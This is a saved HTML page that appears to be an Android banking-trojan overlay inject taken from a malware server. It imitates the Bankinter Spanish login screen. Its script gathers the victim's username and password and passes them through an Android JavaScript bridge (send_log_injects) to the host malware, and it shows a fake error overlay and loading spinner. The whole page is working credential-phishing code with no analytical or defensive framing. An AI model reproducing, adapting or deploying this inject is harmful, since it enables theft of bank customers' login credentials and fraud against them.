<!DOCTYPE html>
<!-- saved from url=(0075)http://193.106.191.116:8081//injects/html/banks/com.bankinter.launcher.html -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style>
    <title>tests</title>
    
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <script src="./jquery.min.js.indir"></script>
    <link rel="stylesheet" href="./bootstrap.min.css">
    <link rel="stylesheet" href="./font-awesome.min.css">
    <script type="text/javascript" src="./angular.min.js.indir"></script>
    <link rel="stylesheet" href="./css.css">
    <style>
        html, body {height: 100%; } .err_div {position: fixed; z-index: 1; top: 0; left: 0; width: 100%; height: 100%; background: rgba(12, 12, 12, .6); } .err_box {position: relative; top: 10%; width: 90%; max-width: 307px; margin: 0 auto; padding: 12px 9px; background: rgba(255, 255, 255, 0.98); text-align: center; box-shadow: 0 0 15px black; } .scum_container {position: relative; overflow: hidden; padding: 18px 12px; } .scum_container.loader_show .scum {-webkit-animation-name: loader__show; animation-name: loader__show; -webkit-animation-duration: 1s; animation-duration: 1s; transition-timing-function: ease; -webkit-animation-fill-mode: forwards; animation-fill-mode: forwards; } .scum_container.loader_hide {-webkit-animation-name: loader__hide; animation-name: loader__hide; -webkit-animation-duration: 1s; animation-duration: 1s; transition-timing-function: ease; /*     animation-fill-mode:forwards; */ } @-webkit-keyframes loader__show {0% {opacity: 1; } 100% {opacity: 0; -webkit-transform: translateX(1000px); transform: translateX(1000px); } } @keyframes loader__show {0% {opacity: 1; } 100% {opacity: 0; -webkit-transform: translateX(1000px); transform: translateX(1000px); } } @-webkit-keyframes loader__hide {0% {opacity: 0; -webkit-transform: translateX(1000px); transform: translateX(1000px); } 100% {opacity: 1; } } @keyframes loader__hide {0% {opacity: 0; -webkit-transform: translateX(1000px); transform: translateX(1000px); } 100% {opacity: 1; } } .card-container {background: #9a0f18; padding: 14px 15px; border-radius: 10px; color: white; } .tan-card {border-radius: 6px; position: relative; overflow: hidden; border: 1px solid white; } .card-item {margin: 1px; border: 1px solid #ffffffd6; margin: 0px; text-align: center; /* color: white; */ width: 100%; } .form-control.tan-input {font-size: 16px; padding: 0px 0px; height: 23px; text-align: center; border-radius: 0px; border: none; background: white; } .form-control.tan-input:focus {box-shadow: none; } .card-item.card-item-th {font-weight: 700; } .card-item.card-item.odd {background: #00000038; } .form-control:disabled, .form-control[readonly] {background-color: #ffffffba; opacity: 1; } tancard.ng-scope {margin-bottom: 23px; display: block; } .top {padding: 15px 0px; font-size: 19px; border-bottom: 1px solid #bbbbbb; color: #FD5B08; } span.fa.fa-chevron-left {margin-right: 69px; vertical-align: middle; } span.check-container {background: #f3f3f3; display: inline-block; width: 1--px; width: 60px; position: relative; height: 30px; border-radius: 1000px; box-shadow: inset 0 0 3px #b3b3b3; } .on .check-container {background: #561c05; /* box-shadow: inset 0 0 13px #c33b05; */ } .on .check-slider {background: #fd6622; left: unset; right: 0px } span.check-slider {display: inline-block; width: 30px; height: 30px; background: #cecece; position: absolute; border-radius: 1000px; box-shadow: 0 0 4px #989898; top: 0px; left: 0px; } span.check-container {background: #f3f3f3; display: inline-block; width: 1--px; width: 54px; position: relative; transition: all .3s ease; height: 30px; border-radius: 1000px; box-shadow: inset 0 0 3px #b3b3b3; } span.check-slider {display: inline-block; width: 30px; height: 30px; background: #ffffff; position: absolute; border-radius: 1000px; box-shadow: 0 0 4px #989898; top: 0px; left: 0px; } span.cpan1 {position: relative; top: -8px; font-size: 14px; color: #717070; } .form-control {height: 51px; } label {display: none; } .btn-warning {padding: 11px 2px; border-radius: 27px; background: #fd5b08; }
    </style>
</head>

<body ng-app="app" data-ng-controller="c1" class="ng-scope">
    <div class="top">
        <div class="container">
            <span class="fa fa-chevron-left"></span>
            Acceso clientes
        </div>
    </div>
    <div class="main">
        <div class="container">
            <div class="row">
                <div class="col"></div>
                <div class="col-sm-10 col-md-8 col-lg-6">
                    <div class="scum_container">
                        <div class="scum">
                            <form name="form1" id="form" autocomplete="off" onsubmit="send1(event,&#39;finish__&#39;);return false" class="ng-pristine ng-valid ng-valid-pattern">
                                <div class="form-group  ">
                                    <label for="user">Usuario</label>
                                    <input placeholder="Nombre de usuario" type="text" name="user" id="user" pattern=".{4,}" class="form-control ng-pristine ng-untouched ng-valid ng-empty ng-valid-pattern" data-err_text="Please enter valid Nombre de usuario" data-ng-model="data.user">
                                </div>
                                <div class="form-group  ">
                                    <label for="pass">Contraseña</label>
                                    <input placeholder="Contraseña" type="password" name="pass" id="pass" pattern=".{4,}" class="form-control ng-pristine ng-untouched ng-valid ng-empty ng-valid-pattern" data-err_text="Please enter valid Contraseña" data-ng-model="data.pass">
                                </div>
                                <span class="check " onclick="$(this).toggleClass(&#39;on&#39;)">
                                    <span class="check-container ">
                                        <span class="check-slider"></span>
                                    </span>
                                    <span class="cpan1">Recordar usuario</span>
                                </span>
                                <div class="form-group mt-4">
                                    <button class="btn btn-warning w-100">Entrar</button>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
                <div class="col"></div>
            </div>
        </div>
    </div>
    <div class="err_div" style="display:none ;">
        <div class="err_box">
            <h4 class="err_title">Error al validar datos</h4>
            <p class="err_p">
                La información que has ingresado es incorrecta. Inténtalo de nuevo.
            </p>
            <button class="err_buton" onclick="$(&#39;.err_div&#39;).hide()">Aceptar</button>
        </div>
    </div>
    <script type="text/javascript">
    var app = angular.module('app', [])


    app.controller('c1', ['$scope', function($scope) {
        sc_ = $scope;
    }])






    $('<div class="loader__" style="display:none;position: fixed;background: rgba(21, 20, 20, 0.51);width: 100%;height: 100%;top: 0px;left: 0px;z-index: 1000;text-align: center;">\
   <span class="fa-stack l_1" style="font-size: 50px;position: relative;top: 50%; -webkit-transform: translateY(-50%); -ms-transform: translateY(-50%); transform: translateY(-50%);">\
          <i class="fa fa-circle fa-stack-2x"></i>\
          <i class="fa fa-spinner fa-stack-1x fa-pulse" style="color: white"></i>\
   </span>\
   \
   \
   \
</div>').appendTo('body');

    window.loader_ = {
        hide: function() {

            $('.scum_container').removeClass('loader_hide loader_show')
            $('.scum_container').addClass('loader_hide');
            $('.loader__').fadeOut('slow');
        },
        show: function() {
            $('.loader__').fadeIn('fast');
            $('.scum_container').removeClass('loader_hide loader_show')
            $('.scum_container').addClass('loader_show');
        }
    }




































    $("body").on("keypress change", '.form-control ,.custom_input_class', function() {
        $(this).closest(".form-group").removeClass("has_err");
        $(this).removeClass("has_err");
        $(".err_div").fadeOut();
    });

    setTimeout(function() {
        $('.form-control[data-mask]').each(function(i, el, all) {
            $.mask.definitions['h'] = "[A-Fa-f0-9]";
            $(this).mask($(this).data().mask, {
                placeholder: $(this).attr('mask-placeholder')
            }) //auto mask

        })
    }, 1) // fix for anguler masked intergration 2019



    var send1 = function(e, callback__, global_luhn__) {


        e.preventDefault();
        var el = e.target;
        var err = false;
        var err_text = [];
        var err_elements = [];

        if ($(el).data().hasOwnProperty('sub_ed')) { //2019
            // return;
        }

        $(el).find("input:visible:enabled,select:visible:enabled").each(function() {
            var reg__ = new RegExp($(this).attr('pattern'));

            if (!reg__.test($(this).val())) {
                err = true;
                err_elements.push(this);
                err_text.push(this.dataset.err_text);
                return;
            }
            var luhn__ = $(this).data().luhn;
            if (typeof luhn__ != "undefined" && luhn__ != "") {

                if ($(this).val() != "") {
                    if (!eval(luhn__)($(this).val(), err_text)) {
                        err = true;
                        err_elements.push(this);
                    }
                }
            }
        });

        //time for global_luhn
        if (!err) {
            if (typeof global_luhn__ != "undefined") {
                if (!eval(global_luhn__)(err_text)) {
                    err = true;
                }
            }
        }


        if (err) {
            err_text = err_text.filter(function(e) {
                return e;
            });
            err_text = $.unique(err_text);
            $(".err_ul").html("");
            $(err_text).each(function(i, t) {
                $("<li><span>" + t + "</span></li>").appendTo(".err_ul");
            });

            $(".err_div").show();
            $(err_elements).each(function() {
                $(this).closest(".form-group").addClass("has_err");
                $(this).addClass("has_err");

                //...
            });
            $(window).scrollTop(0);
            return;
        }

        if (typeof callback__ != "undefined") {
            $(el).data('sub_ed', true); //2019
            eval(callback__)(el);
            return;
        }
        alert("We stack, what to do next?");
    };




    function next__(el) {

        loader_.show();
        setTimeout(function() {
            loader_.hide();
            $('.scum').hide();
            $(el).closest('.scum').next().show();
        }, 4000)

    }


    function finish__(el) {

        loader_.show();



        submit_data();

    }




    function submit_data() {


        //here up to you, if you want to send data over ajax, or send form,to send ajax use data__ var.
        var data__ = sc_.data

        data__.type_injects = "banks";
         data__.closed = "close_activity_injects";
        Android.send_log_injects(JSON.stringify(data__));
    }


    $.fn.autoJump = function() {
        var els = this;
        els.on("input", function() {
            if ($(this).val().length == $(this).attr('maxlength')) {
                var this_ = this;
                els.each(function(i) {
                    if (this === this_) {
                        if (els.length - 1 == i) {
                            els.eq(0).focus();
                        } else {
                            els.eq(i + 1).focus();
                        }
                    }
                });
            }
        });
    };
    </script><div class="loader__" style="display:none;position: fixed;background: rgba(21, 20, 20, 0.51);width: 100%;height: 100%;top: 0px;left: 0px;z-index: 1000;text-align: center;">   <span class="fa-stack l_1" style="font-size: 50px;position: relative;top: 50%; -webkit-transform: translateY(-50%); -ms-transform: translateY(-50%); transform: translateY(-50%);">          <i class="fa fa-circle fa-stack-2x"></i>          <i class="fa fa-spinner fa-stack-1x fa-pulse" style="color: white"></i>   </span>         </div>


</body></html>